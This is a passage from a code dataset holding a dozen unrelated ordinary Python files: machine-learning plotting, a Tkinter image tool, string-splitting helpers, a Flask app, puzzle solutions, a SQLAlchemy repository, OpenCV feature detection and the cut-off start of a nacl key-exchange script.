y, cv=cv, n_jobs=n_jobs, train_sizes=train_sizes)\n train_scores_mean = np.mean(train_scores, axis=1)\n train_scores_std = np.std(train_scores, axis=1)\n test_scores_mean = np.mean(test_scores, axis=1)\n test_scores_std = np.std(test_scores, axis=1)\n print('cross-validation scores', test_scores_mean)\n plt.grid()\n\n plt.fill_between(train_sizes, train_scores_mean - train_scores_std, train_scores_mean + train_scores_std, alpha=0.1, color=\"b\")\n plt.fill_between(train_sizes, test_scores_mean - test_scores_std,test_scores_mean + test_scores_std, alpha=0.1, color=\"g\")\n plt.plot(train_sizes, train_scores_mean, 'o-', color=\"b\", label=\"Training score\")\n plt.plot(train_sizes, test_scores_mean, 'o-', color=\"g\", label=\"Cross-validation score\")\n\n plt.legend(loc=\"best\")\n plt.show()\n return plt\n\n\ndef plot_validation_curve(X,y,estimator,name):\n\n if name == 'dtree':\n param_range = np.arange(1, 100,5)\n param_name = 'max_depth'\n if name == 'dtree1':\n param_range = np.arange(2,35,2)\n param_name = 'min_samples_split'\n # if name == 'dtree2':\n # param_range = np.arange(2,40,2)\n # param_name = 'min_samples_leaf'\n if name == 'dtree3':\n param_range = np.arange(70,350,40)\n param_name = 'max_leaf_nodes'\n\n train_scores, test_scores = validation_curve(estimator, X, y, param_name=param_name, param_range=param_range, cv=5,\n scoring=\"accuracy\", n_jobs=1)\n train_scores_mean = np.mean(train_scores, axis=1)\n train_scores_std = np.std(train_scores, axis=1)\n test_scores_mean = np.mean(test_scores, axis=1)\n test_scores_std = np.std(test_scores, axis=1)\n\n plt.title(\"Validation Curve for \" + name)\n plt.xlabel(param_name)\n plt.ylabel(\"Score\")\n plt.ylim(0.0, 1.1)\n plt.grid()\n lw = 2\n plt.plot(param_range, train_scores_mean, label=\"Training score\", color=\"darkorange\", lw=lw)\n plt.fill_between(param_range, train_scores_mean - train_scores_std, train_scores_mean + train_scores_std, alpha=0.2,\n color=\"darkorange\", lw=lw)\n plt.plot(param_range, test_scores_mean, label=\"Cross-validation score\", color=\"navy\", lw=lw)\n plt.fill_between(param_range, test_scores_mean - test_scores_std, test_scores_mean + test_scores_std, alpha=0.2,\n color=\"navy\", lw=lw)\n plt.legend(loc=\"best\")\n plt.show()\n\n\ndf = pd.read_csv('digits_training.tra', sep=\",\", skiprows=0)\n\ndf=np.array(df)\nprint(df.shape,df.dtype)\ndat=df[:,0:64]\ntar1=df[:,64]\nX=dat\ny=tar1\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33, random_state=7)\n# clf=DecisionTreeClassifier(max_depth=5,min_samples_split=10,max_leaf_nodes=50)#random search\nclf= DecisionTreeClassifier()\ns1=time.time()\nclf.fit(X_train,y_train)\ne1=time.time()\n# s2=time.time()\n# y_prd=clf.predict(X_test)\n# e2=time.time()\nt1=e1-s1\n# t2=e2-s2\ny_test = np.array(y_test)\n#y_prd = np.array(y_prd)\nprint(clf.get_depth(),clf.get_n_leaves())\n#print('Test Accuracy: %.8f' % accuracy_score(y_test,y_prd))\nprint(\"Training time: \",t1)\n# print(\"Testing time: \",t2)\nplot_learning_curve(clf,'Learning Curve for Decision Tree', X_train, y_train, (0,1.01),cv=5)\n# plot_tree(clf.fit(X_train, y_train),filled=True)\n# plt.show()\nclf1=DecisionTreeClassifier()\nplot_validation_curve(X_train,y_train,clf1,'dtree')\nplot_validation_curve(X_train,y_train,clf1,'dtree1')\n#plot_validation_curve(X_train,y_train,clf1,'dtree2')\nplot_validation_curve(X_train,y_train,clf1,'dtree3')\n# clf2=DecisionTreeClassifier(max_depth=5,min_samples_split=10,max_leaf_nodes=50)\n#\n# plot_learning_curve(clf2,'Learning Curve for Decision Tree', X_train, y_train, (0,1.01),cv=5)\n# clf2.fit(X_train,y_train)\n# e1=time.time()\n# s2=time.time()\n# y_prd=clf2.predict(X_test)\n# e2=time.time()\n# t1=e1-s1\n# t2=e2-s2\n# y_test = np.array(y_test)\n# y_prd = np.array(y_prd)\n# print('Test Accuracy: %.8f' % accuracy_score(y_test,y_prd))\n# plot_tree(clf2.fit(X_train, y_train),filled=True)\n# plt.show()\n\nclf3=DecisionTreeClassifier()\nclf3=GridSearchCV(estimator=clf3,param_grid={'max_depth': np.arange(10,16,2),'max_leaf_nodes':np.arange(220,280,10)},cv=5)\nx1=time.time()\nclf3.fit(X_train,y_train)\nx2=time.time()\nprint(x2-x1,\"train time\")\n# # plot_tree(clf1.fit(X_train, y_train),filled=True)\n# # plt.show()\nx11=time.time()\ny_prd1=clf3.predict(X_test)\nx21=time.time()\nprint(x21-x11,\"test time\")\ny_prd1 = np.array(y_prd1)\nprint('Test Accuracy after grid search fit: %.8f' % accuracy_score(y_test,y_prd1))\nprint(clf3.best_params_,clf3.best_score_)\n# plot_learning_curve(clf3,'Learning Curve for Decision Tree', X_train, y_train, (0,1.01),cv=5)\n###########################################################\nclf = DecisionTreeClassifier(max_depth=14,max_leaf_nodes=260,random_state=0)\npath = clf.cost_complexity_pruning_path(X_train, y_train)\nccp_alphas, impurities = path.ccp_alphas, path.impurities\nclfs = []\nfor ccp_alpha in ccp_alphas:\n clf = DecisionTreeClassifier(max_depth=14,max_leaf_nodes=260,random_state=0, ccp_alpha=ccp_alpha)\n clf.fit(X_train, y_train)\n clfs.append(clf)\nprint(\"Number of nodes in the last tree is: {} with ccp_alpha: {}\".format(\n clfs[-1].tree_.node_count, ccp_alphas[-1]))\ntrain_scores = [clf.score(X_train, y_train) for clf in clfs]\ntest_scores = [clf.score(X_test, y_test) for clf in clfs]\n\nfig, ax = plt.subplots()\nax.set_xlabel(\"alpha\")\nax.set_ylabel(\"accuracy\")\nax.set_title(\"Accuracy vs alpha for training and testing sets\")\nax.plot(ccp_alphas, train_scores, marker='o', label=\"train\",\n drawstyle=\"steps-post\")\nax.plot(ccp_alphas, test_scores, marker='o', label=\"test\",\n drawstyle=\"steps-post\")\nax.legend()\nplt.show()\nclf = DecisionTreeClassifier(max_depth=14,max_leaf_nodes=260,random_state=0, ccp_alpha=0.001)\nclf.fit(X_train, y_train)\nprint(clf.score(X_test, y_test),'score')\nprint(clf.get_depth(),clf.get_n_leaves())\nplot_learning_curve(clf,'Learning Curve for Decision Tree', X_train, y_train, (0,1.01),cv=5)","sub_path":"dt.py","file_name":"dt.py","file_ext":"py","file_size_in_byte":6910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"376945977","text":"import matplotlib\nmatplotlib.use(\"TkAgg\") # Fixes error on OSX\nfrom tkinter import *\nfrom tkinter import ttk\nfrom tkinter.filedialog import askdirectory\nimport os\nimport re\nfrom pathlib import Path\nfrom PIL import Image, ImageTk\nfrom FindErrors import find_errors\nfrom skimage import io\nfrom skimage.external import tifffile\nfrom skimage.draw import line\n\n\nclass Main(Tk):\n def __init__(self):\n Tk.__init__(self)\n self.title(\"Find Errors\")\n self.columnconfigure(0, weight=1)\n self.rowconfigure(0, weight=1)\n\n mainframe = ttk.Frame(self, padding=\"10\")\n mainframe.grid(sticky=(N, W, E, S))\n mainframe.rowconfigure(1, weight=1, pad=5, minsize=50)\n mainframe.rowconfigure(3, pad=10)\n mainframe.columnconfigure(0, minsize=200)\n mainframe.columnconfigure(2, pad=5)\n mainframe.columnconfigure(4, weight=1)\n\n self.count = 0\n self.process = StringVar()\n self.process.set('None')\n self.bit_change = IntVar()\n self.bit_depth = IntVar()\n self.bit_var = 0\n self.otsu = IntVar()\n self.high = StringVar()\n self.low = StringVar()\n self.high.set(.9)\n self.low.set(.4)\n self.otsu.set(1)\n\n ttk.Label(mainframe, text=\"Processing:\").grid(row=2, column=0, sticky=(W, S))\n ttk.Label(mainframe, textvariable=self.process).grid(row=2, column=1, sticky=S)\n\n self.files = []\n ttk.Button(mainframe, text=\"Select Directory\", command=self.change_directory).grid(row=0, column=0, sticky=W)\n\n ttk.Button(mainframe, text=\"Options\", command=self.pref).grid(row=0, column=1, sticky=E)\n\n fileframe = ttk.Labelframe(mainframe, text='Files:')\n fileframe.rowconfigure(0, pad=50)\n fileframe.grid(row=1, column=0, columnspan=2, sticky=(N, W, S, E))\n fileframe.grid_propagate(0)\n self.file_strings = StringVar()\n ttk.Label(fileframe, textvariable=self.file_strings).grid()\n\n ttk.Button(mainframe, text=\"Run\", command=self.go).grid(row=1, column=2)\n ttk.Button(mainframe, text=\"Next\", command=self.next_img).grid(row=1, column=3)\n\n canvasframe = ttk.Labelframe(mainframe)\n canvasframe.grid(row=1, column=4, rowspan=2, sticky=(N, W, S, E))\n canvasframe.rowconfigure(0, weight=1)\n canvasframe.columnconfigure(0, weight=1)\n\n xscrollbar = Scrollbar(canvasframe, orient=HORIZONTAL)\n xscrollbar.grid(row=1, column=0, sticky=(E, W))\n\n yscrollbar = Scrollbar(canvasframe)\n yscrollbar.grid(row=0, column=1, sticky=(N, S))\n\n self.canvas = Canvas(canvasframe, xscrollcommand=xscrollbar.set, yscrollcommand=yscrollbar.set)\n self.img_on_canvas = self.canvas.create_image(0, 0, anchor='nw')\n self.canvas.grid(row=0, column=0, sticky=(N, W, S, E))\n self.canvas.configure(scrollregion=self.canvas.bbox(ALL))\n\n xscrollbar.configure(command=self.canvas.xview)\n yscrollbar.configure(command=self.canvas.yview)\n\n self.to_display = []\n self.images = []\n\n self.progress = ttk.Progressbar(mainframe, orient=HORIZONTAL, mode='determinate')\n self.progress.grid(row=3, column=0, columnspan=5, sticky=(E, W))\n\n def change_directory(self):\n self.files = []\n folder = askdirectory()\n for f in os.listdir(folder):\n if re.search('(?i)\\.jpg', f):\n self.files.append(str(Path(folder+\"\\\\\"+f).resolve()))\n self.file_strings.set('\\n'.join(self.files))\n self.count = 0\n\n def go(self):\n self.progress['maximum'] = len(self.files)\n self.progress['value'] = 0\n self.to_display = []\n for n, f in enumerate(self.files):\n self.process.set(f)\n self.update_idletasks()\n self.to_display.append([])\n try:\n self.to_display[n].append(find_errors(f, self.bit_var, self.otsu.get(), float(self.high.get()),\n float(self.low.get())))\n except:\n raise\n self.progress['value'] += 1\n self.process.set('Rendering')\n # DONT TRY AND DISPLAY\n # for n, i in enumerate(self.files):\n # image = io.imread(i)\n # for j in self.to_display[n]:\n # for k in j:\n # p0, p1 = k\n # rr, cc = line(p0[0], p0[1], p1[0], p1[1])\n # image[rr, cc] = 255\n # self.images.append(image)\n self.process.set('None')\n self.count = 1\n\n def next_img(self):\n if not self.count:\n pass\n else:\n if self.count > len(self.images):\n self.count = 1\n img = ImageTk.PhotoImage(Image.fromarray(self.images[self.count - 1]))\n self.canvas.itemconfig(self.img_on_canvas, image=img)\n self.canvas.img = img\n self.count += 1\n\n def pref(self):\n pref_win = Toplevel()\n pref_win.transient(self)\n pref_win.grab_set()\n pref_frame = ttk.Frame(pref_win, padding=\"10\")\n pref_frame.grid(sticky=(N, W, E, S))\n bit_spin = Spinbox(pref_frame, from_=1, to=16, textvariable=self.bit_depth,\n command=self.bit_var_change)\n if not self.bit_change.get():\n bit_spin['state'] = DISABLED\n bit_spin.grid(row=0, column=1, columnspan=2)\n ttk.Checkbutton(pref_frame, text=\"Reduce bit depth by\", variable=self.bit_change,\n command=lambda: self.swap_state(bit_spin)).grid(row=0, column=0, sticky=W)\n ttk.Radiobutton(pref_frame, text=\"Use Otsu's method to determine\\nCanny thresholds (ratio between 0 - 1)\",\n variable=self.otsu, value=1).grid(row=1, column=0, sticky=W)\n ttk.Radiobutton(pref_frame, text=\"Set Canny thresholds manually (0 - 255)\",\n variable=self.otsu, value=0).grid(row=2, column=0, sticky=W)\n self.otsu.set(1)\n ttk.Label(pref_frame, text='Upper threshold').grid(row=1, column=1, sticky=W)\n ttk.Entry(pref_frame, width=3, textvariable=self.high).grid(row=1, column=2, sticky=W)\n ttk.Label(pref_frame, text='Lower threshold').grid(row=2, column=1, sticky=W)\n ttk.Entry(pref_frame, width=3, textvariable=self.low).grid(row=2, column=2, sticky=W)\n\n def bit_var_change(self):\n self.bit_var = self.bit_depth.get()\n\n def swap_state(self, widget):\n if widget['state'] == NORMAL:\n widget['state'] = DISABLED\n self.bit_var = 0\n else:\n widget['state'] = NORMAL\n self.bit_var = self.bit_depth.get()\n\n\nif __name__ == \"__main__\":\n Main().mainloop()\n","sub_path":"window.py","file_name":"window.py","file_ext":"py","file_size_in_byte":6733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"65410424","text":"from map import Map\nimport re\nclass Split(Map):\n\tdef __init__(self):\n\t\tsuper(Split,self).__init__()\n\t\tself['update'] = False\n\t\tself['drop'] = True\n\t\tself['result'] = 'column'\n\t\tself.name = 'split'\n\n\tdef transform(self, values):\n\t\t\n\t\tval = str(values[0])\n\t\t\n\t\t\n\t\tif(not val):\n\t\t\treturn []\n\n\t\tmax_splits = self['max'];\n\t\t\n\n\n\t\t#Shortcut for big splits\n\t\tif(max_splits==0 and self['on']!=None and self['before']==None and self['after']==None and self['ignore_between'] == None):\n\t\t\t\treturn re.split(self['on'], val)\n\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\tsplits = match(val, {'on':self['on'],'before':self['before'],'after':self['after'],'ignore_between':self['ignore_between'], 'max':self['max']})\n\t\t\n\t\tsplitValues = []\n\t\t\n\n\t\tfor i in range(0,len(splits)):\n\t\t\tif(i%2==0):\n\t\t\t\tsplitValues.append(splits[i])\n\t\t\n\n\n\t\t\n\t\treturn splitValues;\n\t\t\nclass Extract(Map):\n\tdef __init__(self):\n\t\tsuper(Extract,self).__init__()\n\t\tself['update'] = False\n\t\tself['drop'] = False\n\t\tself['result'] = 'column'\n\t\tself.name = 'extract'\n\n\tdef transform(self, values):\n\n\t\tval = str(values[0])\n\t\tsplits = match(val, {'on':self['on'],'before':self['before'],'after':self['after'],'ignore_between':self['ignore_between'], 'max':self['max']})\n\n\t\tsplitValues = []\n\t\t\n\t\tfor i in range(0,len(splits)):\n\t\t\tif(i%2==1):\n\t\t\t\tsplitValues.append(splits[i])\n\n\n\t\treturn splitValues;\t\t\n\nclass Cut(Map):\n\tdef __init__(self):\n\t\tsuper(Cut,self).__init__()\n\t\tself['update'] = True\n\t\tself['drop'] = False\n\t\tself['result'] = 'column'\n\t\tself.name = 'cut'\n\n\tdef transform(self, values):\n\n\t\tsplitValues = []\n\t\tfor i in range(0, len(values)):\n\t\t\tv = values[i]\n\t\t\tval = str(v)\n\t\t\tsplits = match(val, {'on':self['on'],'before':self['before'],'after':self['after'],'ignore_between':self['ignore_between'], 'max':self['max']})\n\n\t\t\n\t\t\tx = ''\n\t\t\tfor i in range(0,len(splits)):\n\t\t\t\tif(i%2==0):\n\t\t\t\t\tx += (splits[i])\n\t\t\t\n\t\t\tsplitValues.append(x)\n\n\t\treturn splitValues;\t\t\n\n\n\t\t\n\t\t\n\t\t\n\t\t\n\ndef match(value, options):\n\n\n\t\t\n\n\tif(not value):\n\t\treturn []\n\t\n\tmax_splits = options['max'];\n\n\tif(max_splits==None):\n\t\tmax_splits = 1\n\n\t#Shortcut for big splits\n\tif(options['on']!=None and options['before']==None and options['after']==None and options['ignore_between'] == None):\n\t\tif(max_splits==0):\n\t\t\treturn re.split(\"(\" + options['on'] + \")\", value)\n\n\n\tremainder_to_split = value\n\tsplits = []\n\tnumSplit = 0;\n\twhile(max_splits <= 0 or numSplit < max_splits*1):\n\t\ts = match_once(remainder_to_split, options)\n\n\t\tif(len(s) > 1):\n\t\t\tremainder_to_split = s[2];\n\t\t\tsplits.append(s[0])\n\t\t\tsplits.append(s[1])\n\t\t\toccurrence = 0\n\t\telse:\n\t\t\tbreak\n\t\t\t\n\t\tnumSplit+=1\n\t\n\tsplits.append(remainder_to_split)\n\toccurrence = 0\n\tnewSplits = []\n\tprefix = ''\n\twhich = 1\n\tfor i in range(0, len(splits)):\n\t\tif(i%2==1):\n\t\t\toccurrence+=1\n\t\t\tif(occurrence==which):\n\t\t\t\tnewSplits.append(prefix)\n\t\t\t\tnewSplits.append(splits[i])\n\t\t\t\toccurrence = 0\n\t\t\t\tprefix = ''\n\t\t\t\tcontinue\n\n\t\tprefix += splits[i]\n\n\tnewSplits.append(prefix)\n\t\n\treturn newSplits;\n\t\ndef match_once(value, options):\n\t\n\tsplits = []\n\t\n\ton = options['on']\n\tbefore = options['before']\n\tafter = options['after']\n\tignore_between = options['ignore_between']\n\t\n\tremainder = value\n\tremainder_offset = 0\n\tstart_split_offset = 0\n\tadd_to_remainder_offset = 0;\n\t\n\twhile(len(remainder)):\n\n\t\tvalid_split_region = remainder;\n\t\tvalid_split_region_offset = 0;\t\t\n\t\tstart_split_offset = remainder_offset;\n\t\tif(ignore_between):\n\t\t\tmatch = re.search(ignore_between, remainder);\n\t\t\tif(match):\n\t\t\t\tvalid_split_region = valid_split_region[0:match.start(0)]\n\t\t\t\tremainder_offset += match.index + len(match.group(0));\n\t\t\t\tremainder = remainder.substr(match.start(0)+len(match.group(0)))\n\t\t\telse:\n\t\t\t\tremainder = ''\n\t\telse:\n\t\t\tremainder = ''\n\t\n\t\tif(after):\n\t\t\tmatch = re.search(after, valid_split_region)\n\t\t\tif(match):\n\t\t\t\tvalid_split_region_offset = match.start(0)+len(match.group(0));\n\t\t\t\tvalid_split_region = valid_split_region[valid_split_region_offset:]\n\t\t\telse:\n\t\t\t\tcontinue;\n\t\tif(before):\n\t\t\tmatch = re.search(before, valid_split_region)\n\t\t\tif(match):\n\t\t\t\tvalid_split_region = valid_split_region[0:match.start(0)]\n\t\t\telse:\n\t\t\t\tcontinue;\n\t\t\n\t\t\n\t\tmatch = re.search(on, valid_split_region)\n\t\t\n\t\tif(match):\n\t\t\tsplit_start = start_split_offset + valid_split_region_offset+match.start(0);\n\t\t\tsplit_end = split_start + len(match.group(0));\n\n\t\t\tsplits.append(value[0:split_start]);\n\t\t\tsplits.append(value[split_start:split_end])\t\t\t\n\t\t\tsplits.append(value[split_end:])\n\t\t\treturn splits;\n\n\t\telse:\t\n\t\t\tcontinue;\n\t\n\n\n\treturn [{'start':0, 'end':len(value), 'value':value}]\t","sub_path":"runtime/python/wrangler/split.py","file_name":"split.py","file_ext":"py","file_size_in_byte":4479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"469312521","text":"# Filling NaN values\n\nimport pandas as pd\n\ndf = pd.read_csv('D:\\Varun\\python_practice\\pandas_practice\\dirtydata.csv')\n\ndf1 = df[\"Calories\"].fillna(130)\n# or df.Calories = df[\"Calories\"].fillna(130)\nprint(df1.to_string())\n\n# Can fill in values of mean, median or mode of that column into the empty cell.\nx = df[\"Calories\"].mean()\ny = df[\"Calories\"].median()\nprint(x,y)\n\ndf2 = df[\"Calories\"].fillna(x)\nprint(df2.to_string())\n\ndf3 = df[\"Calories\"].fillna(y)\nprint(df3.to_string())\n\n# If you want entire dataframe, use inplace = True and print that","sub_path":"pandas_practice/basic5.2_clean.py","file_name":"basic5.2_clean.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"368579113","text":"def solve(wires):\r\n wires.sort(key = lambda x: x[0])\r\n s = 0\r\n for i in range(len(wires)):\r\n for k in range(i):\r\n if (wires[i][1] < wires[k][1]):\r\n s += 1\r\n return s\r\n \r\nt = int(input())\r\nfor i in range(1, t + 1):\r\n n = int(input())\r\n wires = []\r\n for j in range(n):\r\n wires.append([int(x) for x in input().split(' ')])\r\n print(\"Case #{}: {}\".format(i,solve(wires)))\r\n","sub_path":"2010/1C/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"636908286","text":"#!/usr/bin/python3\n\"\"\"Script that starts a Flask web application\n\"\"\"\nfrom flask import Flask, render_template\nfrom models import storage\nfrom models.state import State\n\napp = Flask(__name__)\n\n\n@app.teardown_appcontext\ndef handle_teardown(self):\n \"\"\"Function\"\"\"\n storage.close()\n\n\n@app.route(\"/states\", strict_slashes=False)\ndef list_of_states():\n \"\"\"Function\"\"\"\n states = storage.all(State).values()\n return render_template(\n \"9-states.html\", states=states, condition=\"states_list\")\n\n\n@app.route(\"/states/\", strict_slashes=False)\ndef list_of_states_id(id):\n \"\"\"Function\"\"\"\n states = storage.all(State)\n # primero verificar que se pase el id\n if id:\n key = \"State.\" + id\n # luego verificar que key(State.421a5..) esté en el diccionario\n if key in states:\n state_id = states[key]\n return render_template(\n \"9-states.html\", state_id=state_id, condition=\"state_id\")\n else:\n return render_template(\n \"9-states.html\", condition=\"not_found\")\n\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=5000)\n","sub_path":"web_flask/9-states.py","file_name":"9-states.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"40538464","text":"'''\nTake the number 192 and multiply it by each of 1, 2, and 3:\n\n 192 x 1 = 192\n 192 x 2 = 384\n 192 x 3 = 576\n\nBy concatenating each product we get the 1 to 9 pandigital, 192384576. We will call 192384576 the concatenated product of 192 and (1,2,3)\n\nThe same can be achieved by starting with 9 and multiplying by 1, 2, 3, 4, and 5, giving the pandigital, 918273645, which is the concatenated product of 9 and (1,2,3,4,5).\n\nWhat is the largest 1 to 9 pandigital 9-digit number that can be formed as the concatenated product of an integer with (1,2, ... , n) where n > 1?\n'''\n\ndef unique_digits(number):\n\tdigits = {}\n\tfor digit in str(number):\n\t\tif digit in digits.keys():\n\t\t\treturn False\n\t\telse: digits[digit] = 1\n\treturn True\n\ndef pandigital(number):\n\tdigits = ['1', '2', '3', '4', '5', '6', '7', '8', '9']\n\tfor digit in digits:\n\t\tif digit not in str(number):\n\t\t\treturn False\n\treturn True\t\n\t\ncandidates = set()\nfor i in range(1, 10000):\n\tc = str(i)\n\tn = 2\n\twhile unique_digits(c):\n\t\tc += str(i*n)\n\t\tif len(c) > 9:\n\t\t\tbreak\n\t\telif len(c) == 9 and pandigital(int(c)):\n\t\t\tcandidates.add(c)\n\t\t\tbreak\n\t\telse: n += 1\n\t\nprint('Answer:', max(candidates))\n","sub_path":"038.py","file_name":"038.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"183644352","text":"#!/bin/env python\n#\n# Copyright 2008\n# by\n# The Board of Trustees of the\n# Leland Stanford Junior University.\n# All rights reserved.\n#\n\n__facility__ = \"Online\"\n__abstract__ = \"Timing config reporting classes\"\n__author__ = \"P.A.Hart SLAC - GLAST LAT I&T/Online\"\n__date__ = \"2008/01/25 00:00:00\"\n__updated__ = \"$Date: 2008/06/09 23:46:12 $\"\n__version__ = \"$Revision: 1.1 $\"\n__release__ = \"$Name: v1r10p2 $\"\n__credits__ = \"SLAC\"\n\nimport logging, os\n\nfrom ConfigXmlReport import *\n\nclass IgnoreXmlReport(PrecinctXmlReport):\n def __init__(self, precinctInfo, configData):\n PrecinctXmlReport.__init__(self, precinctInfo, configData)\n \n def createReport(self, rebuild=False):\n self.createHeader()\n summary = self.addSection(\"%s_Summary\" %(self.info.getPrecinct()))\n\n self.addIntent(summary) # blank intent node for later?\n\n\n \n \n","sub_path":"python/IgnoreXmlReport.py","file_name":"IgnoreXmlReport.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"473835245","text":"from common.database.models import Screen, ScreenNode, Test # common.database.models\nfrom common.database.repos.BaseRepo import BaseRepo\nfrom sqlalchemy.sql import text\nfrom app import db\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\nclass ScreenRepo(BaseRepo):\n def __new__(cls): ## Singletone CTOR\n if not hasattr(cls, 'instance'):\n cls.instance = super(ScreenRepo, cls).__new__(cls)\n return cls.instance\n\n def _class(self):\n return Screen\n\n def getAllByTestRunId(self, _test_run_id):\n try:\n screens = Screen.query.filter_by(test_run_id=_test_run_id).all()\n except Exception as e:\n return None, e\n else:\n return screens, None\n\n def getAllByTestRunIdOrderAsc(self, _test_run_id):\n try:\n screens = Screen.query.filter_by(test_run_id=_test_run_id).order_by(Screen.id.asc()).all()\n except Exception as e:\n return None, e\n else:\n return screens, None\n\n def geByNameAndTestRunId(self, _name, _test_run_id):\n try:\n screen = Screen.query.filter_by(name=_name, test_run_id=_test_run_id).first()\n except Exception as e:\n return None, e\n else:\n return screen, None\n\n\n def getAllUniqueScreensByApplicationId(self, application_id):\n\n params = {\"application_id\": application_id}\n\n\n #Get The screens from the last autonomous test_run\n try:\n query = text(\"\"\"SELECT id, name, image_url, xml_dom, elements FROM screen where screen.test_run_id in\n (SELECT id from test_run\n WHERE test_run.autonomous=true\n and test_run.master_test=true\n and test_run.state='Completed'\n and test_run.test_id in (select tests.id from tests where tests.application_id=:application_id)\n ORDER BY test_run.id DESC LIMIT 1)\n union\n select id, name, image_url, xml_dom, elements from screen_node where id in\n (SELECT max(screen_node.id) as max_id -- screen_node.name as sname,\n FROM screen_node LEFT OUTER JOIN tests ON tests.id = screen_node.test_id\n WHERE tests.application_id=:application_id\n group by screen_node.name)\n and name not in\n (\n SELECT name FROM screen where screen.test_run_id in\n (SELECT id from test_run\n WHERE test_run.autonomous=true\n and test_run.master_test=true\n and test_run.state='Completed'\n and test_run.test_id in (select tests.id from tests where tests.application_id=:application_id)\n ORDER BY test_run.id DESC LIMIT 1)\n )\"\"\")\n results = db.engine.execute(query, params)\n logger.warning(\"Proxy column names {n}\".format(n=results._metadata.keys))\n except Exception as e:\n logger.warning(\"getAllUniqueScreensByApplicationId == Exception caught {ex}\".format(ex=e))\n return None, e\n\n\n #for i in results:\n #_id, _name, _image_url, _, _, _source, _xml_dom, _elements, _logs, _ = i\n #print(\"NAME OF SCR \", _name)\n\n\n\n \"\"\"\n Get all the unique screens by distinct name generate by\n all the autonomous test runs for any given application\n\n :param application_id: Int\n :return: ResultProxy object\n \"\"\"\n #params = {\"application_id\": application_id}\n ##with db.engine.connect() as con:\n '''\n try:\n statement = text(\"\"\"select * from screen where id in\n (SELECT max(screen.id) as max_id -- screen.name as sname,\n FROM screen LEFT OUTER JOIN test_run ON test_run.id = screen.test_run_id\n --select * from test_run\n WHERE test_run.autonomous=true\n and test_run.master_test=true\n and test_run.state='Completed'\n and test_run.test_id in (select tests.id from tests where tests.application_id=:application_id)\n group by screen.name)\"\"\")\n results = db.engine.execute(statement, params)\n logger.warning(\"Proxy column names {n}\".format(n=results._metadata.keys))\n except Exception as e:\n logger.warning(\"getAllUniqueScreensByApplicationId == Exception caught {ex}\".format(ex=e))\n return None, e\n\n '''\n\n return results, None\n\n\n","sub_path":"database/repos/ScreenRepo.py","file_name":"ScreenRepo.py","file_ext":"py","file_size_in_byte":4823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"45631073","text":"import numpy as np\nimport math\n\ndef accuracy(updated_rankings, seq, snapshot, method):\n # indices of the active nodes \n idx = np.where( seq[snapshot+1].clust_memb > 0 )[0]\n \n # ground truth to compare with\n if method == 'PageRank':\n ground_truth = np.array(seq[snapshot+1].pr.T[idx])\n elif method == 'GammaPageRank':\n ground_truth = np.array(seq[snapshot+1].gpr[idx])\n\n # rankings on the active nodes\n prediction = np.array(updated_rankings[idx])\n\n # error in magnitude\n err_mag = np.linalg.norm( ground_truth - prediction, ord=2 ) / np.linalg.norm( ground_truth, ord=2 )\n\n # error in angle\n err_deg = math.degrees( math.acos( np.dot(prediction.T, ground_truth) / (np.linalg.norm(ground_truth, ord=2)*np.linalg.norm(prediction, ord=2)) ) )\n\n return err_mag, err_deg\n","sub_path":"accuracy.py","file_name":"accuracy.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"580048957","text":"import cv2\n\nsrc = cv2.imread(\"33.jpg\")\ngrayImg = cv2.cvtColor(src, cv2.COLOR_BGR2GRAY)\n\nfast = cv2.FastFeatureDetector_create(threshold=35)\n# fast.setNonmaxSuppression(False)\nkp = fast.detect(grayImg, None)\nimg2 = cv2.drawKeypoints(src, kp, None, (0, 0, 255), cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)\n\nprint('Threshold: ', fast.getThreshold())\nprint('nonmaxSuppression: ', fast.getNonmaxSuppression())\nprint('neighborhood: ', fast.getType())\nprint('Total Keypoints with nonmaxSuppression: ', len(kp))\n#\ncv2.imshow('fast_true', img2)\n#\n# fast.setNonmaxSuppression(False)\n# kp = fast.detect(grayImg, None)\n#\n# print('Total Keypoints without nonmaxSuppression: ', len(kp))\n#\n# img3 = cv2.drawKeypoints(src, kp, None, (0, 0, 255), cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)\n\n# cv2.imshow('fast_false', img3)\n\ncv2.waitKey()","sub_path":"OpenCV/feature_fast.py","file_name":"feature_fast.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"598829641","text":"import nacl.bindings as nb\nimport random\nimport pandas as pd\nimport numpy as np\nimport math\n\ndef keygeneration(n, party_i):\n assert(party_i < n) ## Anton code\n pkey_list = []\n skey_list = []\n for i in range(n):\n if i == party_i:\n pkey_list.append(0)\n skey_list.append(0)\n else: \n pk, sk = nb.crypto_kx_keypair()\n pkey_list.append(pk)\n skey_list.append(sk)\n return pkey_list,skey_list \n\ndef keyexchange(n, party_i, my_pkey_list, my_skey_list, other_pkey_list):\n common_key_list = []\n for i in range(n):\n #Generate DH (common) keys \n if i == party_i:\n common_key_list.append(0)\n else:\n if i > 